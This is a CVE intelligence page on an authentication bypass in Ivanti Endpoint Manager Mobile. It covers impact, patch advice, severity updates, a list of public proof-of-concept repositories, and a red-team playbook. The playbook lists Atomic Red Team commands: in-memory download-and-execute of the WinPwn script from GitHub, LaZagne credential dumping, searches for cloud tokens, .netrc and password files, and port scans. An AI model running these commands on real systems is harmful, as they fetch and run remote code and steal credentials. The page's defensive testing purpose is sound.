CVE-2023-35078
Overview
This vulnerability is an authentication bypass flaw rooted in improper access control validation within Ivanti Endpoint Manager Mobile. The issue arises because the application fails to enforce authentication checks on certain API endpoints, allowing unauthorized users to invoke restricted functionality. The affected component is the mobile endpoint management server's API interface responsible for handling authentication and session validation.
Vulnerability Description
An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication.
Impact
An attacker with network access to the affected system can bypass authentication controls without any valid credentials or user interaction. This enables unauthorized access to restricted application functions and sensitive data, potentially allowing full control over the endpoint management system. The compromise can lead to data breaches, unauthorized configuration changes, and lateral movement within the enterprise environment.
Solution
Ivanti has released security updates addressing this authentication bypass in Endpoint Manager Mobile. Administrators should apply the vendor-provided patches as detailed in Ivanti’s security advisory available at https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability. Following the update instructions in the advisory ensures proper enforcement of authentication on all API endpoints.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The authentication bypass vulnerability present in Ivanti Endpoint Manager Mobile (EPMM) represents a significant security concern, as it allows unauthorized users to gain access to restricted functionalities and resources within the application without undergoing the necessary authentication processes. This flaw arises from improper validation mechanisms that fail to adequately enforce access controls, enabling attackers to exploit the system and interact with sensitive data or administrative functions. The high CVSS score of 9.8 underscores the severity of this vulnerability, indicating that it poses a critical risk to organizations utilizing the affected product.
Attack vectors for this vulnerability are varied, with potential exploitation occurring through multiple means. An attacker could leverage social engineering tactics to gain access to a legitimate user’s session or exploit weaknesses in the application’s API endpoints. For instance, by crafting specific requests that bypass authentication checks, an attacker can manipulate the application to grant unauthorized access to sensitive areas, such as user management or configuration settings. Additionally, if the application is integrated with other systems, an attacker might exploit this vulnerability to pivot into those systems, further escalating the impact of the breach.
The real-world implications of this vulnerability can be profound, particularly for organizations that rely heavily on mobile device management solutions. Unauthorized access could lead to data breaches, exposing sensitive corporate information, personal data of employees, or confidential client information. The potential for data exfiltration not only jeopardizes the integrity of the organization’s data but also poses significant compliance risks, especially for industries governed by strict data protection regulations. Furthermore, the reputational damage resulting from a successful exploitation could lead to loss of customer trust and a decline in business opportunities, compounding the financial impact of the incident.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and penetration testing should be conducted to identify potential weaknesses within the application and its configurations. Additionally, monitoring for unusual access patterns or unauthorized changes within the application can help in early detection of exploitation attempts. Organizations should also ensure that they are running the latest version of the Ivanti EPMM software, as vendors typically release patches to address known vulnerabilities. Furthermore, implementing robust access controls, including multi-factor authentication and least privilege principles, can significantly reduce the risk of unauthorized access.
In conclusion, the authentication bypass vulnerability in Ivanti Endpoint Manager Mobile poses a critical threat to organizations, enabling unauthorized access to sensitive functionalities and data. The potential for exploitation through various attack vectors highlights the need for proactive security measures and ongoing vigilance. By adopting comprehensive detection and mitigation strategies, organizations can safeguard their assets and maintain the integrity of their mobile device management solutions, ultimately reducing the risk associated with this significant vulnerability.
The CVSS score for CVE-2023-35078 has been updated from 9.8 to a maximum of 10.0, reflecting a reassessment of the vulnerability’s criticality and its potential impact on affected environments. Despite this increase in severity rating, CSURFACE threat intelligence reports a significant reduction in detection activity across our telemetry, indicating a possible decline in active exploitation attempts or improved defensive postures among targeted organizations. The EPSS score remains effectively stable, suggesting that while the vulnerability remains highly exploitable, the immediate exploitation pressure has not intensified. Notably, the vulnerability continues to be linked with ransomware campaigns, underscoring its attractiveness to threat actors seeking unauthorized access for lateral movement or data exfiltration. The emergence and persistence of multiple proof-of-concept exploits on public repositories maintain the risk of opportunistic attacks, particularly against unpatched systems. Collectively, these developments reinforce the critical nature of CVE-2023-35078 but also suggest a nuanced threat landscape where exploitation attempts may be more targeted or controlled. Defenders should remain vigilant given the vulnerability’s maximum severity rating and ongoing ransomware associations, even as active exploitation signals show a downward trend.
Update 2 — July 06, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-35078, reflected in a modest rise in exploitation attempts observed by our sensors. Concurrently, the CVSS score was adjusted slightly downward to 9.8, reflecting a refined understanding of the vulnerability’s impact but maintaining its critical severity. The persistence of multiple publicly available proof-of-concept exploits continues to lower the barrier for adversaries, sustaining the risk of opportunistic attacks against unpatched Ivanti Endpoint Manager Mobile deployments. While the overall exploitation trend remains stable without rapid escalation, the association with known ransomware campaigns underscores the ongoing strategic value of this vulnerability for threat actors. This combination of factors suggests defenders should maintain heightened vigilance, as the vulnerability remains a high-risk vector for unauthorized access and potential lateral movement within targeted environments.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager Mobile | All |
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Mobile | All |
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Mobile | All |
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (8)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
vaishnochaitanya/CVE-2023-35078-Exploit-POC
CVE-2023-35078 Remote Unauthenticated API Access Vulnerability Exploit POC
|
vaishnochaitanya | 117 | 28 | 2023-07-29 | View |
|
vchan-in/CVE-2023-35078-Exploit-POC
CVE-2023-35078 Remote Unauthenticated API Access Vulnerability Exploit POC
|
vchan-in | 117 | 28 | 2023-07-29 | View |
|
lager1/CVE-2023-35078
Proof of concept script to check if the site is vulnerable to CVE-2023-35078
|
lager1 | 5 | 1 | 2023-07-29 | View |
|
raytheon0x21/CVE-2023-35078
Tools to scanner & exploit cve-2023-35078
|
raytheon0x21 | 5 | 1 | 2023-07-31 | View |
|
emanueldosreis/nmap-CVE-2023-35078-Exploit
Nmap script to exploit CVE-2023-35078 - Mobile Iron Core
|
emanueldosreis | 1 | 1 | 2023-08-01 | View |
|
0nsec/CVE-2023-35078
CVE-2023-35078 - Ivanti MobileIron Core Remote Unauthenticated API Access Exploit tool
|
0nsec | 1 | 0 | 2025-08-21 | View |
|
synfinner/CVE-2023-35078
Easy and non-intrusive script to check for CVE-2023-35078
|
synfinner | 0 | 1 | 2023-07-31 | View |
|
Blue-number/CVE-2023-35078
Ivanti Endpoint Manager Mobile (EPMM) POC
|
Blue-number | 0 | 0 | 2023-08-30 | View |
Threat Feed
34 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-35078 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/KB-Remote-unauthenticated-API-access-vulnerability-CVE-2023-35078 |
| cisa.gov |
GitHub CVE
|
https://www.cisa.gov/news-events/alerts/2023/07/24/ivanti-releases-security-updates-endpoint-manager-mobile-epmm-cve-2023-35078 |
| ivanti.com |
GitHub CVE
|
https://www.ivanti.com/blog/cve-2023-35078-new-ivanti-epmm-vulnerability |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-35078 |